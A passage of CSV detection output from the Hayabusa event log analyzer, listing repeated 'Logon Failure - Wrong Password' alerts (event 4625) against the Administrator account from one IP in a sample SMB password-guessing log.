NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.382 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.027 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.222 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.514 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.946 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.602 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.654 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.778 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.101 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.398 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.529 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP 